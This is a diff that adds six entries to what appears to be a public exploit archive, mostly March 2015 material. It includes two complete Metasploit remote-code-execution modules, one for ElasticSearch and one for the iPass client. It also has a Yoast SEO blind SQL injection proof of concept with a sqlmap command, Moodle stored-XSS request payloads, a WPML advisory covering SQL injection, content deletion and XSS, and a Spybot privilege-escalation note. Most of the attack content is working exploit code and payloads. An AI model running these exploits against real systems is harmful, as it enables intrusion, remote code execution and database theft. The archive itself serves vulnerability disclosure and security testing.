diff --git a/files.csv b/files.csv
index 5c2140517..a02644605 100755
--- a/files.csv
+++ b/files.csv
@@ -32833,3 +32833,9 @@ id,file,description,date,author,platform,type,port
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
+36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
+36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
+36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
+36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
+36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt
new file mode 100755
index 000000000..c694dbdf3
--- /dev/null
+++ b/platforms/aix/dos/36413.txt
@@ -0,0 +1,74 @@
+Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
+Version/s Tested: 1.7.3.3
+Patched Version: 1.7.4
+CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
+CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
+WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
+
+Description:
+
+WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
+to improve the Search Engine Optimization (SEO) of WordPress sites. The
+latest version at the time of writing (1.7.3.3) has been found to be
+affected by two authenticated (admin, editor or author user) Blind SQL
+Injection vulnerabilities. The plugin has more than one million downloads
+according to WordPress.
+
+Technical Description:
+
+The authenticated Blind SQL Injection vulnerability can be found within the
+'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
+parameters are not sufficiently sanitised before being used within a SQL
+query.
+
+Line 529:
+
+$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
+$_GET['orderby'] ) ) : 'post_title';
+
+Line 533:
+
+order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
+
+If the GET orderby parameter value is not empty it will pass its value
+through WordPess's own esc_sql() function. According to WordPress this
+function 'Prepares a string for use as an SQL query. A glorified
+addslashes() that works with arrays.'. However, this is not sufficient to
+prevent SQL Injection as can be seen from our Proof of Concept.
+
+Proof of Concept (PoC):
+
+The following GET request will cause the SQL query to execute and sleep for
+10 seconds if clicked on as an authenticated admin, editor or author user.
+
+http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
+
+Using SQLMap:
+
+python sqlmap.py -u "
+http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
+--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
+wordpress_logged_in_9dee67...;"
+
+Impact:
+
+As there is no anti-CSRF protection a remote unauthenticated attacker could
+use this vulnerability to execute arbitrary SQL queries on the victim
+WordPress web site by enticing an authenticated admin, editor or author
+user to click on a specially crafted link or visit a page they control.
+
+One possible attack scenario would be an attacker adding their own
+administrative user to the target WordPress site, allowing them to
+compromise the entire web site.
+
+Timeline:
+
+March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
+(WPScan Team - Dewhurst Security).
+March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
+March 10th 2015 - 20:00 GMT: Vendor contacted via email.
+March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
+expected patch timeline.
+March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
+this issue.
+March 11th 2015 - 12:30 GMT: Advisory released.
\ No newline at end of file
diff --git a/platforms/java/remote/36415.rb b/platforms/java/remote/36415.rb
new file mode 100755
index 000000000..8eefab764
--- /dev/null
+++ b/platforms/java/remote/36415.rb
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',
+ 'Description' => %q{
+ This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
+ exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
+ REST API, which does not require authentication, where the search function allows
+ groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
+ to reference arbitrary classes. It can be used to execute arbitrary Java code. This
+ module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
+ },
+ 'Author' =>
+ [
+ 'Cameron Morris', # Vulnerability discovery
+ 'Darren Martyn', # Public Exploit
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-1427'],
+ ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
+ ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
+ ['URL', 'http://drops.wooyun.org/papers/5107']
+ ],
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ ['ElasticSearch 1.4.2', {}]
+ ],
+ 'DisclosureDate' => 'Feb 11 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(9200),
+ OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
+ ], self.class)
+ end
+
+ def check
+ result = Exploit::CheckCode::Safe
+
+ if vulnerable?
+ result = Exploit::CheckCode::Vulnerable
+ end
+
+ result
+ end
+
+ def exploit
+ print_status("#{peer} - Checking vulnerability...")
+ unless vulnerable?
+ fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
+ end
+
+ print_status("#{peer} - Discovering TEMP path...")
+ res = execute(java_tmp_dir)
+ tmp_dir = parse_result(res)
+ if tmp_dir.nil?
+ fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
+ else
+ print_good("#{peer} - TEMP path on '#{tmp_dir}'")
+ end
+
+ print_status("#{peer} - Discovering remote OS...")
+ res = execute(java_os)
+ os = parse_result(res)
+ if os.nil?
+ fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
+ else
+ print_good("#{peer} - Remote OS is '#{os}'")
+ end
+
+ if os =~ /win/i
+ tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
+ else
+ tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
+ end
+
+ register_files_for_cleanup(tmp_file)
+
+ print_status("#{peer} - Trying to load metasploit payload...")
+ java = java_load_class(os, tmp_file)
+ execute(java)
+ end
+
+ def vulnerable?
+ java = 'java.lang.Math.class.forName("java.lang.Runtime")'
+
+ vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
+ res = execute(java)
+ result = parse_result(res)
+
+ if result.nil?
+ vprint_status("#{peer} - no response to test")
+ return false
+ elsif result == 'class java.lang.Runtime'
+ return true
+ end
+
+ false
+ end
+
+ def parse_result(res)
+ unless res
+ vprint_error("#{peer} - No response")
+ return nil
+ end
+
+ unless res.code == 200 && res.body
+ vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
+ return nil
+ end
+
+ begin
+ json = JSON.parse(res.body.to_s)
+ rescue JSON::ParserError
+ return nil
+ end
+
+ begin
+ result = json['hits']['hits'][0]['fields']['msf_result']
+ rescue
+ return nil
+ end
+
+ result.is_a?(::Array) ? result.first : result
+ end
+
+ def java_tmp_dir
+ 'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
+ end
+
+ def java_os
+ 'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
+ end
+
+ def java_load_class(os, tmp_file)
+ if os =~ /win/i
+ tmp_file.gsub!(/\\/, '\\\\\\\\')
+ end
+
+ java = [
+ 'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
+ 'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
+ "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
+ 'b64_i=b64.newInstance();',
+ "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
+ 'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
+ 'file_class=java.lang.Math.class.forName("java.io.File");',
+ "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
+ 'loader=loader_class.newInstance();',
+ 'loader.addURL(file_url);',
+ 'm=loader.loadClass(\'metasploit.Payload\');',
+ 'm.main(null);'
+ ]
+
+ java.join
+ end
+
+ def execute(java, timeout = 20)
+ payload = {
+ "size" => 1,
+ "query" => {
+ "filtered" => {
+ "query" => {
+ "match_all" => {}
+ }
+ }
+ },
+ "script_fields" => {
+ "msf_result" => {
+ "script" => java
+ }
+ }
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path.to_s, "_search"),
+ 'method' => 'POST',
+ 'data' => JSON.generate(payload)
+ }, timeout)
+
+ res
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/36414.txt b/platforms/php/webapps/36414.txt
new file mode 100755
index 000000000..362cdbdf8
--- /dev/null
+++ b/platforms/php/webapps/36414.txt
@@ -0,0 +1,106 @@
+OVERVIEW
+==========
+
+WPML is the industry standard for creating multi-lingual WordPress
+sites. Three vulnerabilities were found in the plug-in. The most
+serious of them, an SQL injection problem, allows anyone to read the
+contents of the WordPress database, including user details and
+password hashes, without authentication.
+
+System administrators should update to version 3.1.9.1 released
+earlier this week to resolve the issues.
+
+
+
+DETAILS
+========
+
+1. SQL injection
+
+When WPML processed a HTTP POST request containing the parameter
+”action=wp-link-ajax”, the current language is determined by parsing
+the HTTP referer. The parsed language code is not checked for
+validity, nor SQL-escaped. The user doesn’t need to be logged in.
+
+By sending a carefully crafted referer value with the mentioned POST
+request parameter, an attacker can perform SQL queries on arbitrary
+tables and retrieve their results. In addition to the standard
+WordPress database and tables, the attacker may query all other
+databases and tables accessible to the web backend.
+
+The following HTML snippet demonstrates the vulnerability:
+
+
+
+
+
+The results of the SQL query will be shown in the comments feed XML-formatted.
+
+
+
+2. Page/post/menu deletion
+
+WPML contains a ”menu sync” function which helps site administrators
+to keep WordPress menus consistent across different languages. This
+functionality lacked any access control, allowing anyone to delete
+practically all content of the website - posts, pages, and menus.
+
+Example:
+
+
+
+Submitting the above form would delete the row with the ID 12345 in
+the wp_posts database. Several items be deleted with the same request.
+
+
+
+3. Reflected XSS
+
+The ”reminder popup” code intended for administrators in WPML didn’t
+check for login status or nonce. An attacker can direct target users
+to an URL like:
+
+https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f
+
+
+to execute JavaScript in their browser. This example bypasses the
+Chrome XSS Auditor.
+
+In the case of WordPress, XSS triggered by an administrator can lead
+to server-side compromise via the plugin and theme editors.
+
+
+
+CREDITS
+========
+
+The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
+researching WordPress plugins falling in the scope of the Facebook bug
+bounty program.
+
+The vendor was notified on March 02, 2015 and the patch was released
+on March 10.
+
+Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/
+
+An up-to-date version of this document can be found on our website
+http://klikki.fi .
+
+
+--
+Jouko Pynnönen
+Klikki Oy - http://klikki.fi
\ No newline at end of file
diff --git a/platforms/php/webapps/36418.txt b/platforms/php/webapps/36418.txt
new file mode 100755
index 000000000..c226b372a
--- /dev/null
+++ b/platforms/php/webapps/36418.txt
@@ -0,0 +1,148 @@
+?
+Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting
+
+
+Vendor: Moodle Pty Ltd
+Product web page: https://www.moodle.org
+Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9
+
+Summary: Moodle is a learning platform designed to provide
+educators, administrators and learners with a single robust,
+secure and integrated system to create personalised learning
+environments.
+
+Desc: Moodle suffers from persistent XSS vulnerabilities. Input
+passed to the POST parameters 'config_title' and 'title' thru
+index.php, are not properly sanitized allowing the attacker to
+execute HTML or JS code into user's browser session on the affected
+site. Affected components: Blocks, Glossary, RSS and Tags.
+
+Tested on: nginx
+ PHP/5.4.22
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5236
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php
+
+Vendor Advisory ID: MSA-15-0013
+Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383
+
+CVE ID: CVE-2015-2269
+CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269
+
+
+09.02.2015
+
+--
+
+
+Random Glossary Entry
+---------------------
+
+POST http://WEB/my/index.php HTTP/1.1
+
+
+_qf__block_glossary_random_edit_form=1
+bui_contexts=0
+bui_defaultregion=side-pre
+bui_defaultweight=4
+bui_editid=304
+bui_editingatfrontpage=0
+bui_pagetypepattern=my-index
+bui_parentcontextid=411
+bui_region=side-pre
+bui_subpagepattern=%@NULL@%
+bui_visible=1
+bui_weight=4
+config_addentry=test
+config_invisible=test2
+config_refresh=0
+config_showconcept=1
+config_title=" onmouseover=prompt("XSS1") >
+config_type=0
+config_viewglossary=test3
+mform_isexpanded_id_configheader=1
+mform_isexpanded_id_onthispage=0
+mform_isexpanded_id_whereheader=0
+sesskey=S8TXvxdEKF
+submitbutton=Save changes
+
+
+Remote RSS Feeds
+----------------
+
+POST http://WEB/my/index.php HTTP/1.1
+
+
+_qf__block_rss_client_edit_form=1
+bui_contexts=0
+bui_defaultregion=side-pre
+bui_defaultweight=4
+bui_editid=312
+bui_editingatfrontpage=0
+bui_pagetypepattern=my-index
+bui_parentcontextid=411
+bui_region=side-pre
+bui_subpagepattern=%@NULL@%
+bui_visible=1
+bui_weight=4
+config_block_rss_client_show_channel_image=0
+config_block_rss_client_show_channel_link=0
+config_display_description=0
+config_rssid=_qf__force_multiselect_submission
+config_rssid[]=3
+config_shownumentries=11
+config_title=" onmouseover=prompt("XSS2") >
+mform_isexpanded_id_configheader=1
+mform_isexpanded_id_onthispage=0
+mform_isexpanded_id_whereheader=0
+sesskey=S8TXvxdEKF
+submitbutton=Save changes
+
+
+Tags
+----
+
+POST http://WEB/my/index.php HTTP/1.1
+
+
+_qf__block_tags_edit_form=1
+bui_contexts=0
+bui_defaultregion=side-pre
+bui_defaultweight=4
+bui_editid=313
+bui_editingatfrontpage=0
+bui_pagetypepattern=my-index
+bui_parentcontextid=411
+bui_region=side-pre
+bui_subpagepattern=%@NULL@%
+bui_visible=1
+bui_weight=4
+config_numberoftags=80
+config_tagtype=
+config_title=Tags" onmouseover=prompt("XSS3") >
+mform_isexpanded_id_configheader=1
+mform_isexpanded_id_onthispage=0
+mform_isexpanded_id_whereheader=0
+sesskey=S8TXvxdEKF
+submitbutton=Save changes
+
+
+Older not supported versions
+----------------------------
+
+POST http://WEB/blog/index.php HTTP/1.1
+
+blockaction=config
+filterselect=1343
+filtertype=user
+instanceid=4992
+numberoftags=20
+sesskey=0QCG5LQz0Q
+sort=name
+timewithin=90
+title=ZSL">
diff --git a/platforms/windows/local/36417.txt b/platforms/windows/local/36417.txt
new file mode 100755
index 000000000..7c966d724
--- /dev/null
+++ b/platforms/windows/local/36417.txt
@@ -0,0 +1,53 @@
+?
+Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation
+
+
+Vendor: Safer-Networking Ltd.
+Product web page: http://www.safer-networking.org
+Affected version: 1.6.2
+
+Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal
+computer program compatible with Microsoft Windows 95 and later. It scans
+the computer hard disk and/or RAM for malicious software.
+
+Desc: The application suffers from an unquoted search path issue impacting
+the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system. A
+successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+Tested on: Microsoft Windows Ultimate 7 SP1 (EN)
+
+
+Vulnerability discovered by Aljaz Ceru
+ aljaz@insec.si
+
+
+Advisory ID: ZSL-2015-5237
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php
+
+
+17.02.2015
+
+---
+
+
+C:\Users\user>sc qc SBSDWSCService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SBSDWSCService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : SBSD Security Center Service
+ DEPENDENCIES : wscsvc
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\user>
diff --git a/platforms/windows/remote/36412.rb b/platforms/windows/remote/36412.rb
new file mode 100755
index 000000000..deee20bfc
--- /dev/null
+++ b/platforms/windows/remote/36412.rb
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::SMB::Client::Authenticated
+ include Msf::Exploit::Remote::SMB::Server::Share
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IPass Control Pipe Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in the IPass Client service. This service provides a
+ named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
+ to force the service to load a DLL from a SMB share.
+ },
+ 'Author' =>
+ [
+ 'Matthias Kaiser', # Vulnerability discovery
+ 'h0ng10 ', # Metasploit Module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2015-0925' ],
+ [ 'OSVDB', '117423' ],
+ [ 'BID', '72265' ],
+ [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 2048,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows x32', { 'Arch' => ARCH_X86 } ],
+ [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jan 21 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+ ], self.class)
+
+ deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
+ end
+
+ def check
+ echo_value = rand_text_alphanumeric(rand(10) + 10)
+
+ begin
+ response = send_command("System.Echo #{echo_value}")
+ if response =~ Regexp.new(echo_value)
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ rescue Rex::ConnectionError => e
+ vprint_error("Connection failed: #{e.class}: #{e}")
+ return Msf::Exploit::CheckCode::Unknown
+ rescue Rex::Proto::SMB::Exceptions::LoginError => e
+ vprint_error('Connection reset during login')
+ return Msf::Exploit::CheckCode::Unknown
+ end
+ end
+
+ def setup
+ super
+ self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
+ self.share = Rex::Text.rand_text_alpha(5)
+ end
+
+ def primer
+ self.file_contents = generate_payload_dll
+ print_status("File available on #{unc}...")
+ send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
+ end
+
+ def send_command(command)
+ # The connection is closed after each command, so we have to reopen it
+ connect
+ smb_login
+ pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
+ pipe.write(Rex::Text.to_unicode(command))
+ response = Rex::Text.to_ascii(pipe.read)
+
+ response
+ end
+
+
+ def exploit
+ begin
+ Timeout.timeout(datastore['SMB_DELAY']) { super }
+ rescue Timeout::Error
+ # do nothing... just finish exploit and stop smb server...
+ end
+ end
+
+end
\ No newline at end of file